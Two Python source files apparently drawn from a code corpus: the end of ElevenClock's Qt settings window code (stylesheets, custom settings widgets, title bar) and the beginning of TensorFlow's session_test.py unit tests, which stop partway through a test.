border: {self.getPx(0)}px solid #bbbbbb;
background-color: rgb({colors[3]});
border-radius: {self.getPx(5)}px;
image: url("{getPath("tick_black.png")}");
}}
#stChk::indicator:checked:disabled {{
border: {self.getPx(1)}px solid #bbbbbb;
background-color: #eeeeee;
color: #bbbbbb;
border-radius: {self.getPx(6)}px;
image: url("{getPath("tick_white.png")}");
}}
#stCmbbx {{
width: 100px;
background-color: #ffffff;
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid #dddddd;
height: {self.getPx(25)}px;
padding-left: {self.getPx(10)}px;
border-bottom: {self.getPx(1)}px solid #cccccc;
}}
#stCmbbx:disabled {{
width: 100px;
background-color: #eeeeee;
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid #dddddd;
height: {self.getPx(25)}px;
padding-left: {self.getPx(10)}px;
border-top: {self.getPx(1)}px solid #dddddd;
}}
#stCmbbx:hover {{
background-color: #f6f6f6;
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid #dddddd;
height: {self.getPx(25)}px;
padding-left: {self.getPx(10)}px;
border-bottom: {self.getPx(1)}px solid #cccccc;
}}
#stCmbbx::drop-down {{
subcontrol-origin: padding;
subcontrol-position: top right;
padding: {self.getPx(5)}px;
border-radius: {self.getPx(6)}px;
border: none;
width: {self.getPx(30)}px;
}}
#stCmbbx::down-arrow {{
image: url("{getPath(f"down-arrow_{self.iconMode}.png")}");
height: {self.getPx(8)}px;
width: {self.getPx(8)}px;
}}
#stCmbbx::down-arrow:disabled {{
image: url("{getPath(f"down-arrow_{self.iconMode}.png")}");
height: {self.getPx(2)}px;
width: {self.getPx(2)}px;
}}
#stCmbbx QAbstractItemView {{
border: {self.getPx(1)}px solid #dddddd;
padding: {self.getPx(4)}px;
outline: 0px;
background-color: #ffffff;
border-radius: {self.getPx(8)}px;
}}
#stCmbbx QAbstractItemView::item{{
height: {self.getPx(30)}px;
border: none;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
#stCmbbx QAbstractItemView::item:selected{{
background-color: #eeeeee;
height: {self.getPx(30)}px;
outline: none;
color: black;
border: none;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
QScrollArea, QVBoxLayout{{
border: none;
margin: 0px;
padding: 0px;
outline: none;
}}
QScrollBar:vertical {{
background: #ffffff;
margin: {self.getPx(4)}px;
width: {self.getPx(20)}px;
border: none;
border-radius: {self.getPx(5)}px;
}}
QScrollBar::handle:vertical {{
margin: {self.getPx(3)}px;
border-radius: {self.getPx(3)}px;
background: #dddddd;
}}
QScrollBar::handle:vertical:hover {{
margin: {self.getPx(3)}px;
border-radius: {self.getPx(3)}px;
background: #bbbbbb;
}}
QScrollBar::add-line:vertical {{
height: 0;
subcontrol-position: bottom;
subcontrol-origin: margin;
}}
QScrollBar::sub-line:vertical {{
height: 0;
subcontrol-position: top;
subcontrol-origin: margin;
}}
QScrollBar::up-arrow:vertical, QScrollBar::down-arrow:vertical {{
background: none;
}}
QScrollBar::add-page:vertical, QScrollBar::sub-page:vertical {{
background: none;
}}
""")
def showDebugInfo(self):
global old_stdout, buffer
win = QMainWindow(self)
win.resize(800, 600)
win.setWindowTitle("ElevenClock's log")
textEdit = QPlainTextEdit()
textEdit.setReadOnly(True)
textEdit.setPlainText(globals.buffer.getvalue())
win.setCentralWidget(textEdit)
win.show()
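# Movement handler: if automatic size updates are disabled, schedule a helper thread to re-enable them after one second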
def moveEvent(self, event: QMoveEvent) -> None:
if not self.updateSize:
def enableUpdateSize(self: SettingsWindow):
time.sleep(1)
self.updateSize = True
self.updateSize = False
KillableThread(target=enableUpdateSize, args=(self,)).start()
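# After the user releases the mouse (e.g. finishing a resize), resize the content, reapply the stylesheets and restore the rounded corners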
def mouseReleaseEvent(self, event) -> None:
if(self.updateSize):
self.settingsWidget.resize(self.width()-self.getPx(17), self.settingsWidget.height())
self.settingsWidget.setMinimumHeight(self.settingsWidget.sizeHint().height())
self.applyStyleSheet()
self.scrollArea.setStyleSheet(f"QScrollArea{{border-bottom-left-radius: {self.getPx(6)}px;border-bottom-right-radius: {self.getPx(6)}px;}}")
self.titlebar.setStyleSheet(f"#ControlWidget{{border-top-left-radius: {self.getPx(6)}px;border-top-right-radius: {self.getPx(6)}px;}}#closeButton{{border-top-right-radius: {self.getPx(6)}px;}}")
self.vlayout.setContentsMargins(2, 2, 2, 2)
self.updateSize = False
return super().mouseReleaseEvent(event)
def resizeEvent(self, event: QMoveEvent) -> None:
self.settingsWidget.resize(self.width()-self.getPx(17), self.settingsWidget.height())
self.settingsWidget.setMinimumHeight(self.settingsWidget.sizeHint().height())
def show(self) -> None:
self.applyStyleSheet()
self.raise_()
self.vlayout.setContentsMargins(2, 2, 2, 2)
return super().show()
def eventFilter(self, watched: QObject, event: QEvent) -> bool:
if event.type() == event.WindowStateChange:
if self.isMaximized():
self.scrollArea.setStyleSheet(f"QScrollArea{{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;}}")
self.titlebar.setStyleSheet(f"#ControlWidget{{border-top-left-radius: 0px;border-top-right-radius: 0px;}}#closeButton{{border-top-right-radius: 0px;}}")
self.vlayout.setContentsMargins(0, 0, 0, 0)
else:
self.scrollArea.setStyleSheet(f"QScrollArea{{border-bottom-left-radius: {self.getPx(6)}px;border-bottom-right-radius: {self.getPx(6)}px;}}")
self.titlebar.setStyleSheet(f"#ControlWidget{{border-top-left-radius: {self.getPx(6)}px;border-top-right-radius: {self.getPx(6)}px;}}#closeButton{{border-top-right-radius: {self.getPx(6)}px;}}")
self.vlayout.setContentsMargins(2, 2, 2, 2)
return super().eventFilter(watched, event)
def showEvent(self, event: QShowEvent) -> None:
self.resize(900, 600)
self.settingsWidget.setMinimumHeight(self.settingsWidget.sizeHint().height())
return super().showEvent(event)
def closeEvent(self, event: QCloseEvent) -> None:
self.hide()
event.ignore()
def getPx(self, original) -> int:
return int(original*(self.screen().logicalDotsPerInchX()/96))
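# Section header widget: an icon followed by a title label (object name "subtitleLabel")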
class QIconLabel(QWidget):
def __init__(self, text, icon=None):
super().__init__()
self.setObjectName("subtitleLabel")
self.label = QLabel(text, self)
if lang == lang_zh_TW or lang == lang_zh_CN:
self.label.setStyleSheet("font-size: 13pt;background: none;font-family: \"Microsoft JhengHei UI\";")
else:
self.label.setStyleSheet("font-size: 13pt;background: none;font-family: \"Segoe UI Variable Display\";")
self.image = QLabel(self)
self.image.setPixmap(QIcon(icon).pixmap(QSize(24, 24)))
self.image.setStyleSheet("padding: 3px;background: none;")
self.setAttribute(Qt.WA_StyledBackground)
def getPx(self, original) -> int:
return int(original*(self.screen().logicalDotsPerInchX()/96))
def setIcon(self, icon: str) -> None:
self.image.setPixmap(QIcon(icon).pixmap(QSize(24, 24)))
def resizeEvent(self, event: QResizeEvent) -> None:
self.label.move(self.getPx(60), self.getPx(25))
self.label.setFixedHeight(self.getPx(30))
self.image.move(self.getPx(22), self.getPx(25))
self.image.setFixedHeight(self.getPx(30))
self.setFixedHeight(self.getPx(70))
self.image.setFixedHeight(self.getPx(30))
self.label.setFixedWidth(self.width()-self.getPx(70))
self.image.setFixedWidth(self.getPx(30))
return super().resizeEvent(event)
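# Settings row with a descriptive label and a push button on the right; re-emits the button's clicked() signal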
class QSettingsButton(QWidget):
clicked = Signal()
def __init__(self, text="", btntext="", parent=None, h = 30):
super().__init__(parent)
self.fh = h
self.setAttribute(Qt.WA_StyledBackground)
self.button = QPushButton(btntext+" ", self)
self.button.setLayoutDirection(Qt.RightToLeft)
self.setObjectName("stBtn")
self.label = QLabel(text, self)
if lang == lang_zh_TW or lang == lang_zh_CN:
self.label.setStyleSheet("font-size: 10pt;background: none;font-family: \"Microsoft JhengHei UI\";font-weight: 450;")
self.button.setStyleSheet("font-size: 10pt;font-family: \"Microsoft JhengHei UI\";font-weight: 450;")
self.label.setObjectName("StLbl")
else:
self.label.setStyleSheet("font-size: 9pt;background: none;font-family: \"Segoe UI Variable Text\";font-weight: 450;")
self.button.setStyleSheet("font-size: 9pt;font-family: \"Segoe UI Variable Text\";font-weight: 450;")
self.label.setObjectName("StLbl")
self.button.clicked.connect(self.clicked.emit)
def getPx(self, original) -> int:
return int(original*(self.screen().logicalDotsPerInchX()/96))
def resizeEvent(self, event: QResizeEvent) -> None:
self.button.move(self.width()-self.getPx(170), self.getPx(10))
self.label.move(self.getPx(60), self.getPx(10))
self.label.setFixedWidth(self.width()-self.getPx(230))
self.label.setFixedHeight(self.getPx(self.fh))
self.setFixedHeight(self.getPx(50+(self.fh-30)))
self.button.setFixedHeight(self.getPx(self.fh))
self.button.setFixedWidth(self.getPx(150))
return super().resizeEvent(event)
def setIcon(self, icon: QIcon) -> None:
self.button.setIcon(icon)
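# Settings row with a label, a combo box and a hidden "Restart ElevenClock" accent button; emits textChanged(str)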
class QSettingsComboBox(QWidget):
textChanged = Signal(str)
def __init__(self, text="", btntext="", parent=None):
super().__init__(parent)
self.setAttribute(Qt.WA_StyledBackground)
self.combobox = QComboBox(self)
self.combobox.setObjectName("stCmbbx")
self.combobox.setItemDelegate(QStyledItemDelegate(self.combobox))
self.setObjectName("stBtn")
self.restartButton = QPushButton("Restart ElevenClock", self)
self.restartButton.hide()
self.restartButton.setObjectName("AccentButton")
self.label = QLabel(text, self)
if lang == lang_zh_TW or lang == lang_zh_CN:
self.label.setStyleSheet("font-size: 11pt;background: none;font-family: \"Microsoft JhengHei UI\";font-weight: 450;")
self.combobox.setStyleSheet("font-size: 11pt;font-family: \"Microsoft JhengHei UI\";font-weight: 450;")
self.restartButton.setStyleSheet("font-size: 11pt;font-family: \"Microsoft JhengHei UI\";font-weight: 450;")
else:
self.label.setStyleSheet("font-size: 9pt;background: none;font-family: \"Segoe UI Variable Text\";font-weight: 450;")
self.combobox.setStyleSheet("font-size: 9pt;font-family: \"Segoe UI Variable Text\";font-weight: 450;")
self.restartButton.setStyleSheet("font-size: 9pt;font-family: \"Segoe UI Variable Text\";font-weight: 450;")
self.label.setObjectName("StLbl")
def getPx(self, original) -> int:
return int(original*(self.screen().logicalDotsPerInchX()/96))
def setItems(self, items: list, index: int) -> None:
self.combobox.addItems(items)
try:
self.combobox.setCurrentIndex(index)
except Exception as e:
report(e)
self.combobox.setCurrentIndex(0)
self.combobox.currentTextChanged.connect(self.textChanged.emit)
def resizeEvent(self, event: QResizeEvent) -> None:
self.combobox.move(self.width()-self.getPx(270), self.getPx(10))
self.label.move(self.getPx(60), self.getPx(10))
self.label.setFixedWidth(self.width()-self.getPx(480))
self.label.setFixedHeight(self.getPx(30))
self.restartButton.move(self.width()-self.getPx(430), self.getPx(10))
self.restartButton.setFixedWidth(self.getPx(150))
self.restartButton.setFixedHeight(self.getPx(30))
self.setFixedHeight(self.getPx(50))
self.combobox.setFixedHeight(self.getPx(30))
self.combobox.setFixedWidth(self.getPx(250))
return super().resizeEvent(event)
def setIcon(self, icon: QIcon) -> None:
pass
#self.button.setIcon(icon)
def showRestartButton(self) -> None:
self.restartButton.show()
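# Settings row wrapping a single checkbox; re-emits its stateChanged signal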
class QSettingsCheckBox(QWidget):
stateChanged = Signal(bool)
def __init__(self, text="", parent=None):
super().__init__(parent)
self.setAttribute(Qt.WA_StyledBackground)
self.setObjectName("stChkBg")
self.checkbox = QCheckBox(text, self)
if lang == lang_zh_TW or lang == lang_zh_CN:
self.checkbox.setStyleSheet("font-size: 11pt;background: none;font-family: \"Microsoft JhengHei UI\";font-weight: 450;")
else:
self.checkbox.setStyleSheet("font-size: 9pt;background: none;font-family: \"Segoe UI Variable Text\";font-weight: 450;")
self.checkbox.setObjectName("stChk")
self.checkbox.stateChanged.connect(self.stateChanged.emit)
def setChecked(self, checked: bool) -> None:
self.checkbox.setChecked(checked)
def isChecked(self) -> bool:
return self.checkbox.isChecked()
def getPx(self, original) -> int:
return int(original*(self.screen().logicalDotsPerInchX()/96))
def resizeEvent(self, event: QResizeEvent) -> None:
self.checkbox.move(self.getPx(60), self.getPx(10))
self.checkbox.setFixedHeight(self.getPx(30))
self.checkbox.setFixedWidth(self.width()-self.getPx(70))
self.setFixedHeight(self.getPx(50))
return super().resizeEvent(event)
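# Checkbox row with an attached size combo box that is enabled only while the checkbox is checked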
class QSettingsSizeBoxComboBox(QSettingsCheckBox):
stateChanged = Signal(bool)
valueChanged = Signal(str)
def __init__(self, text: str, parent=None):
super().__init__(text=text, parent=parent)
self.setAttribute(Qt.WA_StyledBackground)
self.combobox = QComboBox(self)
self.combobox.setObjectName("stCmbbx")
self.combobox.currentIndexChanged.connect(self.valuechangedEvent)
self.checkbox.stateChanged.connect(self.stateChangedEvent)
self.stateChangedEvent(self.checkbox.isChecked())
def resizeEvent(self, event: QResizeEvent) -> None:
self.combobox.move(self.width()-self.getPx(270), self.getPx(10))
self.checkbox.move(self.getPx(60), self.getPx(10))
self.checkbox.setFixedWidth(self.width()-self.getPx(280))
self.checkbox.setFixedHeight(self.getPx(30))
self.setFixedHeight(self.getPx(50))
self.combobox.setFixedHeight(self.getPx(30))
self.combobox.setFixedWidth(self.getPx(250))
return super().resizeEvent(event)
def valuechangedEvent(self, i: int):
self.valueChanged.emit(self.combobox.itemText(i))
def stateChangedEvent(self, v: bool):
self.combobox.setEnabled(self.checkbox.isChecked())
if not self.checkbox.isChecked():
self.combobox.setEnabled(False)
self.combobox.setToolTip(_("<b>{0}</b> needs to be enabled to change this setting").format(_(self.checkbox.text())))
else:
self.combobox.setEnabled(True)
self.combobox.setToolTip("")
self.valueChanged.emit(self.combobox.currentText())
self.stateChanged.emit(v)
def loadItems(self):
self.combobox.clear()
self.combobox.addItems([str(item) for item in [5, 6, 7, 7.5, 8, 8.5, 9, 9.5, 10, 10.5, 11, 11.5, 12, 13, 14, 16]])  # pass a concrete list rather than a generator, which some Qt bindings reject
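# QColorDialog variant that opts into stylesheet-drawn backgrounds (WA_StyledBackground)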
class QCustomColorDialog(QColorDialog):
def __init__(self, parent=None) -> None:  # default to None so the dialog can be created without an explicit parent
super().__init__(parent=parent)
self.setAttribute(Qt.WA_StyledBackground)
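# Checkbox row with a button that opens a color picker; emits the chosen color as an "r,g,b" string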
class QSettingsSizeBoxColorDialog(QSettingsCheckBox):
stateChanged = Signal(bool)
valueChanged = Signal(str)
def __init__(self, text: str, parent=None):
super().__init__(text=text, parent=parent)
self.setAttribute(Qt.WA_StyledBackground)
self.colorDialog = QColorDialog(self)
self.colorDialog.setOptions(QColorDialog.DontUseNativeDialog)
self.button = QPushButton(self)
self.button.setObjectName("stCmbbx")
self.button.setText("Select custom color")
self.button.clicked.connect(self.colorDialog.show)
self.colorDialog.colorSelected.connect(self.valuechangedEvent)
self.checkbox.stateChanged.connect(self.stateChangedEvent)
self.stateChangedEvent(self.checkbox.isChecked())
def resizeEvent(self, event: QResizeEvent) -> None:
self.button.move(self.width()-self.getPx(270), self.getPx(10))
self.checkbox.move(self.getPx(60), self.getPx(10))
self.checkbox.setFixedWidth(self.width()-self.getPx(280))
self.checkbox.setFixedHeight(self.getPx(30))
self.setFixedHeight(self.getPx(50))
self.button.setFixedHeight(self.getPx(30))
self.button.setFixedWidth(self.getPx(250))
return super().resizeEvent(event)
def valuechangedEvent(self, c: QColor):
r = c.red()
g = c.green()
b = c.blue()
color = f"{r},{g},{b}"
self.valueChanged.emit(color)
self.button.setStyleSheet(f"color: rgb({color})")
def stateChangedEvent(self, v: bool):
self.button.setEnabled(self.checkbox.isChecked())
if not self.checkbox.isChecked():
self.button.setEnabled(False)
self.button.setStyleSheet("")
self.button.setToolTip(_("<b>{0}</b> needs to be enabled to change this setting").format(_(self.checkbox.text())))
else:
self.button.setEnabled(True)
self.button.setToolTip("")
self.stateChanged.emit(v)
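# Checkbox row with a font-family selector; the combo box's line edit previews the currently selected font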
class QSettingsFontBoxComboBox(QSettingsCheckBox):
stateChanged = Signal(bool)
valueChanged = Signal(str)
def __init__(self, text: str, parent=None):
super().__init__(text=text, parent=parent)
self.setAttribute(Qt.WA_StyledBackground)
self.combobox = QFontComboBox(self)
self.combobox.setObjectName("stCmbbx")
self.combobox.currentIndexChanged.connect(self.valuechangedEvent)
self.checkbox.stateChanged.connect(self.stateChangedEvent)
self.stateChangedEvent(self.checkbox.isChecked())
def resizeEvent(self, event: QResizeEvent) -> None:
self.combobox.move(self.width()-self.getPx(270), self.getPx(10))
self.checkbox.move(self.getPx(60), self.getPx(10))
self.checkbox.setFixedWidth(self.width()-self.getPx(280))
self.checkbox.setFixedHeight(self.getPx(30))
self.setFixedHeight(self.getPx(50))
self.combobox.setFixedHeight(self.getPx(30))
self.combobox.setFixedWidth(self.getPx(250))
return super().resizeEvent(event)
def valuechangedEvent(self, i: int):
self.valueChanged.emit(self.combobox.itemText(i))
self.combobox.lineEdit().setFont(QFont(self.combobox.itemText(i)))  # setFont() expects a QFont (assumed imported with the rest of the Qt classes), so build one from the family name
def stateChangedEvent(self, v: bool):
self.combobox.setEnabled(self.checkbox.isChecked())
if not self.checkbox.isChecked():
self.combobox.setEnabled(False)
self.combobox.setToolTip(_("<b>{0}</b> needs to be enabled to change this setting").format(_(self.checkbox.text())))
else:
self.combobox.setEnabled(True)
self.combobox.setToolTip("")
self.valueChanged.emit(self.combobox.currentText())
self.combobox.lineEdit().setFont(QFont(self.combobox.currentText()))  # wrap the family name in a QFont before applying it
self.stateChanged.emit(v)
def setItems(self, items: list):
self.combobox.clear()
self.combobox.addItems(items)
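# Custom title bar for the frameless settings window: title label plus minimize, maximize/restore and close buttons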
class QTitleBarWidget(QWidget):
def __init__(self, parent: QMainWindow = ...) -> None:
super().__init__(parent=parent)
self.setAttribute(Qt.WA_StyledBackground)
self.setObjectName("ControlWidget")
self.oldPos = QPoint(0, 0)
self.setFixedHeight(parent.getPx(32))
self.iconMode = "white"
self.closeButton = QPushButton()
self.closeButton.setObjectName("closeButton")
self.closeButton.setIconSize(QSize(parent.getPx(14), parent.getPx(14)))
self.closeButton.setIcon(QIcon(getPath(f"cross_{self.iconMode}.png")))
self.closeButton.setFixedHeight(parent.getPx(32))
self.closeButton.setFixedWidth(parent.getPx(46))
self.closeButton.clicked.connect(parent.close)
self.maximizeButton = QPushButton()
self.maximizeButton.setObjectName("titlebarButton")
self.maximizeButton.setFixedHeight(parent.getPx(32))
self.maximizeButton.setIconSize(QSize(parent.getPx(14), parent.getPx(14)))
self.maximizeButton.setIcon(QIcon(getPath(f"maximize_{self.iconMode}.png")))
self.maximizeButton.setFixedWidth(parent.getPx(46))
self.maximizeButton.clicked.connect(lambda: parent.showNormal() if parent.isMaximized() else parent.showMaximized())
self.minimizeButton = QPushButton()
self.minimizeButton.setObjectName("titlebarButton")
self.minimizeButton.setFixedHeight(parent.getPx(32))
self.minimizeButton.setIconSize(QSize(parent.getPx(12), parent.getPx(12)))
self.minimizeButton.setIcon(QIcon(getPath(f"minimize_{self.iconMode}.png")))
self.minimizeButton.setFixedWidth(parent.getPx(46))
self.minimizeButton.clicked.connect(parent.showMinimized)
self.setLayout(QHBoxLayout())
l = QLabel(_("ElevenClock Settings"))
l.setStyleSheet("background-color: transparent;")
self.layout().addWidget(l)
self.layout().addStretch()
self.layout().setContentsMargins(16, 0, 0, 0)
self.layout().setSpacing(0)
self.layout().addWidget(self.minimizeButton)
self.layout().addWidget(self.maximizeButton)
self.layout().addWidget(self.closeButton)
if __name__ == "__main__":
import __init__
|
session_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.python.client.session.Session."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import random
import os
import sys
import threading
import time
import warnings
import numpy as np
import six
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.framework import attr_value_pb2
from tensorflow.core.lib.core import error_codes_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.client import session
from tensorflow.python.eager import context
from tensorflow.python.framework import common_shapes
from tensorflow.python.framework import config
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import device as framework_device_lib
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import function
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import test_util
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import gen_control_flow_ops
# Import gradients to resolve circular imports
from tensorflow.python.ops import gradients # pylint: disable=unused-import
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import math_ops
# Import resource_variable_ops for the variables-to-tensor implicit conversion.
from tensorflow.python.ops import resource_variable_ops # pylint: disable=unused-import
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
try:
import attr # pylint:disable=g-import-not-at-top
except ImportError:
attr = None
# NOTE(mrry): Dummy shape registration for ops used in the tests, since they
# don't have C++ op registrations on which to attach C++ shape fns.
ops.RegisterShape('ConstructionFails')(common_shapes.unknown_shape)
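# Covers graph selection, device configuration, error reporting, and fetching/feeding of nested, sparse and indexed-slices structures.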
class SessionTest(test_util.TensorFlowTestCase):
def setUp(self):
super(SessionTest, self).setUp()
warnings.simplefilter('always')
def testUseExistingGraph(self):
with ops.Graph().as_default() as g, ops.device('/cpu:0'):
a = constant_op.constant(6.0, shape=[1, 1])
b = constant_op.constant(7.0, shape=[1, 1])
c = math_ops.matmul(a, b, name='matmul')
with session.Session(graph=g):
result = c.eval()
self.assertAllEqual(result, [[42.0]])
def testUseDefaultGraph(self):
with ops.Graph().as_default(), ops.device('/cpu:0'):
a = constant_op.constant(6.0, shape=[1, 1])
b = constant_op.constant(7.0, shape=[1, 1])
c = math_ops.matmul(a, b, name='matmul')
with session.Session():
result = c.eval()
self.assertAllEqual(result, [[42.0]])
def testCreate(self):
with session.Session():
inp = constant_op.constant(10.0, shape=[2, 3], name='W1')
copy = array_ops.identity(inp)
# Test with feed.
# TODO(mrry): Investigate why order='F' didn't work.
arr = np.asarray([[0, 1, 2], [3, 4, 5]], dtype=np.float32, order='C')
copy_val = copy.eval({'W1:0': arr})
self.assertAllEqual(arr, copy_val)
# Test without feed.
copy_val = copy.eval()
self.assertAllEqual(
np.asarray(
[[10.0, 10.0, 10.0], [10.0, 10.0, 10.0]], dtype=np.float32),
copy_val)
def testManyCPUs(self):
with session.Session(
config=config_pb2.ConfigProto(device_count={
'CPU': 2, 'GPU': 0
})) as sess:
inp = constant_op.constant(10.0, name='W1')
self.assertAllEqual(inp.eval(), 10.0)
num_cpu_devices = 0
num_gpu_devices = 0
for device in sess.list_devices():
device_type = framework_device_lib.DeviceSpec.from_string(
device.name).device_type
if device_type == 'CPU':
num_cpu_devices += 1
elif device_type == 'GPU':
num_gpu_devices += 1
self.assertEqual(2, num_cpu_devices)
self.assertEqual(0, num_gpu_devices)
def testPerSessionThreads(self):
with session.Session(
config=config_pb2.ConfigProto(use_per_session_threads=True)):
inp = constant_op.constant(10.0, name='W1')
self.assertAllEqual(inp.eval(), 10.0)
def testSessionInterOpThreadPool(self):
config_pb = config_pb2.ConfigProto()
pool = config_pb.session_inter_op_thread_pool.add()
with session.Session(config=config_pb) as s:
inp = constant_op.constant(10.0, name='W1')
results = s.run([inp])
self.assertAllEqual([10.0], results)
pool = config_pb.session_inter_op_thread_pool.add()
pool.num_threads = 1
with session.Session(config=config_pb) as s:
inp = constant_op.constant(20.0, name='W2')
results = s.run([inp])
self.assertAllEqual([20.0], results)
pool = config_pb.session_inter_op_thread_pool.add()
pool.num_threads = 1
pool.global_name = 't1'
run_options = config_pb2.RunOptions()
run_options.inter_op_thread_pool = (
len(config_pb.session_inter_op_thread_pool) - 1)
with session.Session(config=config_pb) as s:
inp = constant_op.constant(30.0, name='W2')
results = s.run([inp], options=run_options)
self.assertAllEqual([30.0], results)
def testErrorsReported(self):
with session.Session() as s:
constant_op.constant(10.0, name='W1')
with self.assertRaises(ValueError):
s.run('foo:0')
def testErrorPayload(self):
with session.Session():
a = array_ops.placeholder(dtypes.float32)
with self.assertRaisesOpError(lambda e: e.op == a.op):
a.eval()
def testErrorCodeWithNoNodeDef(self):
with session.Session() as s:
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
def exc_predicate(e):
return (e.op is None and e.node_def is None and
e.error_code == error_codes_pb2.INVALID_ARGUMENT)
with self.assertRaisesOpError(exc_predicate):
# Run with a bogus handle.
s.partial_run('foo', r1, feed_dict={a: 1, b: 2})
def testErrorBasedOn(self):
with session.Session() as sess:
a = constant_op.constant(0.0, shape=[2, 3])
# NOTE(mrry): The original_op is nonsense, but used here to test that the
# errors are reported correctly.
with sess.graph._original_op(a.op):
b = array_ops.identity(a, name='id')
with sess.graph._original_op(b.op):
c = array_ops.placeholder(dtypes.float32)
def exc_predicate(e):
return (e.op == c.op and e.op._original_op == b.op and
e.op._original_op._original_op == a.op)
with self.assertRaisesOpError(exc_predicate):
c.eval()
def testFetchNone(self):
with session.Session() as s:
a = constant_op.constant(1.0)
with self.assertRaises(TypeError):
s.run(None)
with self.assertRaises(TypeError):
s.run([None])
with self.assertRaises(TypeError):
s.run({'b': None})
with self.assertRaises(TypeError):
s.run({'a': a, 'b': None})
def testFetchSingleton(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
res = sess.run(a)
self.assertEqual(42.0, res)
res = sess.run(a.op) # An op, not a tensor.
self.assertEqual(None, res)
tensor_runner = sess.make_callable(a)
res = tensor_runner()
self.assertEqual(42.0, res)
op_runner = sess.make_callable(a.op)
res = op_runner()
self.assertEqual(None, res)
def testFetchSingletonByName(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
res = sess.run(a.name)
self.assertEqual(42.0, res)
res = sess.run(a.op) # An op, not a tensor.
self.assertEqual(None, res)
def testFetchList(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
v = variables.Variable([54.0])
assign = v.assign([63.0])
res = sess.run([a, b, c, a.name, assign.op])
self.assertTrue(isinstance(res, list))
self.assertEqual([42.0, None, 44.0, 42.0, None], res)
list_runner = sess.make_callable([a, b, c, a.name, assign.op])
res = list_runner()
self.assertTrue(isinstance(res, list))
self.assertEqual([42.0, None, 44.0, 42.0, None], res)
def testFetchTuple(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
res = sess.run((a, b, c, a.name))
self.assertTrue(isinstance(res, tuple))
self.assertEqual((42.0, None, 44.0, 42.0), res)
tuple_runner = sess.make_callable((a, b, c, a.name))
res = tuple_runner()
self.assertTrue(isinstance(res, tuple))
self.assertEqual((42.0, None, 44.0, 42.0), res)
def testFetchNamedTuple(self):
# pylint: disable=invalid-name
ABC = collections.namedtuple('ABC', ['a', 'b', 'c'])
# pylint: enable=invalid-name
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
res = sess.run(ABC(a, b, c))
self.assertTrue(isinstance(res, ABC))
self.assertEqual(42.0, res.a)
self.assertEqual(None, res.b)
self.assertEqual(44.0, res.c)
namedtuple_runner = sess.make_callable(ABC(a, b, c))
res = namedtuple_runner()
self.assertTrue(isinstance(res, ABC))
self.assertEqual(42.0, res.a)
self.assertEqual(None, res.b)
self.assertEqual(44.0, res.c)
def testFetchDict(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
res = sess.run({'a': a, 'b': b, 'c': c})
self.assertTrue(isinstance(res, dict))
self.assertEqual(42.0, res['a'])
self.assertEqual(None, res['b'])
self.assertEqual(44.0, res['c'])
def testFetchOrderedDict(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
res = sess.run(collections.OrderedDict([(3, a), (2, b), (1, c)]))
self.assertTrue(isinstance(res, collections.OrderedDict))
self.assertEqual([3, 2, 1], list(res.keys()))
self.assertEqual(42.0, res[3])
self.assertEqual(None, res[2])
self.assertEqual(44.0, res[1])
@test_util.run_v1_only('b/120545219')
def testFetchAttrs(self):
if attr is None:
self.skipTest('attr module is unavailable.')
@attr.s
class SampleAttr(object):
field1 = attr.ib()
field2 = attr.ib()
val1 = np.array([1.2, 3.4, 5.6])
val2 = np.array([[1, 2], [4, 3]])
val3 = np.array([10, 20, 30])
t1 = constant_op.constant(val1)
t2 = constant_op.constant(val2)
sample = SampleAttr(t1, t2)
with session.Session() as sess:
result = sess.run(sample)
self.assertIsInstance(result, SampleAttr)
self.assertAllEqual(val1, result.field1)
self.assertAllEqual(val2, result.field2)
result = sess.run(sample, feed_dict={sample.field1: val3})
self.assertIsInstance(result, SampleAttr)
self.assertAllEqual(val3, result.field1)
self.assertAllEqual(val2, result.field2)
@test_util.run_v1_only('b/120545219')
def testFetchNestedAttrs(self):
if attr is None:
self.skipTest('attr module is unavailable.')
@attr.s
class SampleAttr(object):
field0 = attr.ib()
field1 = attr.ib()
v1 = 10
v2 = 20
v3 = np.float32(1.2)
v4 = np.float32(3.4)
v5 = np.float64(100.001)
